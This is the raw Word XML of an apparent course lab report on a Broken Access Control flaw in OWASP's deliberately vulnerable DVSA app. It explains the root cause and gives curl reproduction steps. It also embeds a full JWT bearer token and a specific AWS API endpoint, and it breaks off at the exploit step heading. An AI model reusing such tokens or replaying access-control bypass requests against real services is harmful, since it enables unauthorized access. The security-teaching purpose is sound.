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4459" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFA5ED1" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C80787" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67581ECC" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CEC829" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="467776F4" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRPr="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730F3EA2" w14:textId="77777777" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E13FC43" w14:textId="73147667" w:rsidR="005C76E2" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>ICS-344</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24FB8">
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D0CB2" w14:textId="2FEFD8D9" w:rsidR="00F24FB8" w:rsidRDefault="00F24FB8" w:rsidP="00CF3286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Section 02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C933E8" w14:textId="68E186E3" w:rsidR="00F24FB8" w:rsidRDefault="00CF3286" w:rsidP="00CF3286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 xml:space="preserve">Your DVSA Website </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="002B69BC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
          </w:rPr>
          <w:t>URL:</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A3BA613" w14:textId="0AE73181" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286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>AWS Region</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E1A2F6" w14:textId="1D497218" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286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Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3286">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3286">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>19 April 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF9714E" w14:textId="0C1331C8" w:rsidR="00CF3286" w:rsidRDefault="00CF3286" w:rsidP="00CF3286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>Vulnerability Title(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507680AE" w14:textId="181725AE" w:rsidR="00142AD2" w:rsidRDefault="00142AD2" w:rsidP="00CF3286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Lesson - #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA9F9A" w14:textId="6E176124" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A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1F68C1B" w14:textId="7ED3285E" w:rsidR="00F24FB8" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232CD5CE" w14:textId="679CE937" w:rsidR="00BA72A1" w:rsidRDefault="00184992" w:rsidP="007B6BD3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This lesson demonstrates a Broken Access Control vulnerability in the DVSA application, where a normal authenticated user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directly invoke backend functionality to modify an order without completing the required payment process.</w:t>
      </w:r>
      <w:r w:rsidR="007B6BD3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>In a secure system, only authorized workflows (such as billing completion) should update the order status. However, due to missing authorization checks in the Lambda backend, a user can send a crafted request using the "update" action and modify order data, bypassing the intended business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18516498" w14:textId="3122E45C" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Why This Works / Root Caus</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F1496" w14:textId="46878917" w:rsidR="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability exists due to missing authorization validation in the backend Lambda function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03172B06" w14:textId="56CE61B7" w:rsidR="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Key issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA4372" w14:textId="77777777" w:rsidR="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The "update" action does not verify user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A4416" w14:textId="77777777" w:rsidR="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>No check to ensure only admins or valid workflows can modify order state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B2C61" w14:textId="5ADC7702" w:rsidR="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The backend blindly trusts user-supplied input (order-id, items)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23379951" w14:textId="58A30880" w:rsidR="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Additionally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D582227" w14:textId="59147F97" w:rsidR="00BA72A1" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>No enforcement of proper workflow sequence (e.g., billing before payment confirmation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63819883" w14:textId="7E53F04B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Environment and Setu</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1349CE19" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>AWS Region: us-east-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11745214" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>Application: DVSA (OWASP Damn Vulnerable Serverless Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D7733" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>Services involved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0652A045" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>API Gateway (entry point)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB2825" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>AWS Lambda (order-manager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349FEC4F" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>DynamoDB (order storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76395682" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>Amazon Cognito (authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B8A1D4" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16250B60" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26320EAF" w14:textId="77777777" w:rsidR="00184992" w:rsidRPr="00184992" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D50C82D" w14:textId="696A1AE0" w:rsidR="00BA72A1" w:rsidRDefault="00184992" w:rsidP="00184992">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00184992">
        <w:t>Browser DevTools (to extract JWT token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730E1A1" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="51160CAF" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="2C00F386" w14:textId="08D3D205" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB655A" w14:textId="47FD0CCF" w:rsidR="00BA72A1" w:rsidRPr="006F5137" w:rsidRDefault="0054389F" w:rsidP="0054389F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 0 — Define Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CED790E" w14:textId="41DE6D9F" w:rsidR="0054389F" w:rsidRDefault="0054389F" w:rsidP="0054389F">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054389F">
        <w:t>export API=</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00107E9F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://h3x14rchv6.execute-api.us-east-1.amazonaws.com/dvsa/order</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0547CBBD" w14:textId="5026D422" w:rsidR="0054389F" w:rsidRDefault="0054389F" w:rsidP="0054389F">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0054389F">
        <w:t>export TOKEN_B="eyJraWQiOiJPQkJnV0llaFByYmVLV0orenZ2XC9PRURzeGpyNmJZSERsck1LNzVwU0lOWT0iLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiIwNDM4YjRmOC01MDAxLTcwYjQtZWZhNy04MDBiNmJiMzJhOWEiLCJpc3MiOiJodHRwczpcL1wvY29nbml0by1pZHAudXMtZWFzdC0xLmFtYXpvbmF3cy5jb21cL3VzLWVhc3QtMV9ETDlVclh6RDciLCJjbGllbnRfaWQiOiI2bjFmaXNqZXZoMzBsNjE1YW5zZXRibDFjcyIsIm9yaWdpbl9qdGkiOiIzYjgxNTNiZi1jYzU3LTRlNTktYmU1NC0xNDVkYTA2ZWZkYzkiLCJldmVudF9pZCI6ImQ4NTZkZjIxLTkyOTUtNDkwOS1iNzQ1LWMzZGViMDUwYjczYSIsInRva2VuX3VzZSI6ImFjY2VzcyIsInNjb3BlIjoiYXdzLmNvZ25pdG8uc2lnbmluLnVzZXIuYWRtaW4iLCJhdXRoX3RpbWUiOjE3NzYwMjE3NjIsImV4cCI6MTc3NjAyNTM2MiwiaWF0IjoxNzc2MDIxNzYyLCJqdGkiOiI4OTQ5ZDU0Zi05YjE5LTQzM2YtOTZlZS1kYjA3NDMyMzk3ZjkiLCJ1c2VybmFtZSI6IjA0MzhiNGY4LTUwMDEtNzBiNC1lZmE3LTgwMGI2YmIzMmE5YSJ9.W-2dQ9BPh9bMYRC0blbm0EFgfiDf2QqtGUie84XXHN4c2fx0uY-eha_16w2uVIl-1bTOx37vqR8CWuwcTNiqlJpuryuuqXpzgF1Y3lGbp83RlpC7LHW3M_CNa3gWtDT7dajapIR81DZzLVsVSK6YtyznnhQ38zkbFyZF-9ejt3tBBZq6f3_OwXYmhT0aUYBlkALwB05jTGK1Or2HjqRXgqkvNz5LMyu84_gznHqVmKuYHa0_zTyY3ChgcziEPCQzVHeOV0jjVzl-NwSfD7POyImxppsU6hdh5HHJDw1fLX2WTXWGmDi3SE4LQ-Oy9KAUW7t8aj7T6IoWodypJI2WJQ"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE94B9" w14:textId="3C12C3D2" w:rsidR="00BA72A1" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1 — Create Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDC5A10" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C77F04E" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>-H "content-type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704AA7AA" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>-H "authorization: $TOKEN_B" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0F21F6" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>--data-raw '{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E96C84A" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">  "action":"new",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498E8457" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F5137">
        <w:t>cart</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F5137">
        <w:t>-id":"exploit-cart-001",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B77E60D" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">  "items":{"1":1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A99D279" w14:textId="41C188DE" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>}' | jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09E3F9" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664A9E9E" w14:textId="77777777" w:rsidR="006F5137" w:rsidRDefault="006F5137" w:rsidP="00BA72A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="307262DD" w14:textId="77777777" w:rsidR="006F5137" w:rsidRDefault="006F5137" w:rsidP="00BA72A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AA0ABB" w14:textId="77777777" w:rsidR="006F5137" w:rsidRDefault="006F5137" w:rsidP="00BA72A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156E3EAC" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="00BA72A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B783D2" w14:textId="03A7A452" w:rsidR="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2 — Add Shipping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A11F3DE" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC54CFC" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>-H "content-type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4527485F" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>-H "authorization: $TOKEN_B" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1042DA" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>--data-raw "{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE14C9B" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">  \"action\":\"shipping\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4744C4FA" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">  \"order-id\":\"&lt;ORDER_ID&gt;\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34458F9A" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">  \"data\":{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA2C62F" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">    \"address\":\"test\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E99DE9A" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">    \"email\":\"test@test.com\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD9894" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">    \"name\":\"attacker\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED34F6A" w14:textId="77777777" w:rsidR="006F5137" w:rsidRPr="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F4126D" w14:textId="1B9A73B2" w:rsidR="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5137">
        <w:t>}" | jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7727CB4A" w14:textId="77777777" w:rsidR="006F5137" w:rsidRDefault="006F5137" w:rsidP="006F5137">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3676DFF9" w14:textId="0D58F603" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3146B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Exploit (Broken Access Control)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D67933E" w14:textId="77777777" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
